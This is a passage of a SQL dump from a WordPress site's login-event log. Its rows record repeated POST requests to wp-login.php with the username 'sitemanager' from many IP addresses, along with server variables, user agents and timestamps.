00:00:00'),(94222,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45122\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.209.35\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745542216.102329;s:12:\"REQUEST_TIME\";i:1745542216;}}','162.0.209.35',0,'2025-04-25 06:20:18','1970-01-01 00:00:00'),(94223,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34308\";s:11:\"REMOTE_ADDR\";s:12:\"67.205.6.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745542611.0543649;s:12:\"REQUEST_TIME\";i:1745542611;}}','67.205.6.165',0,'2025-04-25 06:26:52','1970-01-01 00:00:00'),(94224,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50180\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745543010.5759001;s:12:\"REQUEST_TIME\";i:1745543010;}}','198.54.114.37',0,'2025-04-25 06:33:32','1970-01-01 00:00:00'),(94225,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43062\";s:11:\"REMOTE_ADDR\";s:14:\"185.222.163.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745543409.4222269;s:12:\"REQUEST_TIME\";i:1745543409;}}','185.222.163.90',0,'2025-04-25 06:40:11','1970-01-01 00:00:00'),(94226,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55154\";s:11:\"REMOTE_ADDR\";s:13:\"74.208.229.14\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745543804.9789801;s:12:\"REQUEST_TIME\";i:1745543804;}}','74.208.229.14',0,'2025-04-25 06:46:46','1970-01-01 00:00:00'),(94227,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39556\";s:11:\"REMOTE_ADDR\";s:12:\"209.172.2.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745544201.655838;s:12:\"REQUEST_TIME\";i:1745544201;}}','209.172.2.50',0,'2025-04-25 06:53:23','1970-01-01 00:00:00'),(94228,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54392\";s:11:\"REMOTE_ADDR\";s:14:\"152.89.234.220\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745544597.463887;s:12:\"REQUEST_TIME\";i:1745544597;}}','152.89.234.220',0,'2025-04-25 06:59:59','1970-01-01 00:00:00'),(94229,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53982\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.209.35\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745545002.6559441;s:12:\"REQUEST_TIME\";i:1745545002;}}','162.0.209.35',0,'2025-04-25 07:06:44','1970-01-01 00:00:00'),(94230,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56716\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.232.89\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745545404.437454;s:12:\"REQUEST_TIME\";i:1745545404;}}','162.0.232.89',0,'2025-04-25 07:13:26','1970-01-01 00:00:00'),(94231,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57988\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.54.175\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745545802.6622491;s:12:\"REQUEST_TIME\";i:1745545802;}}','188.165.54.175',0,'2025-04-25 07:20:04','1970-01-01 00:00:00'),(94232,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 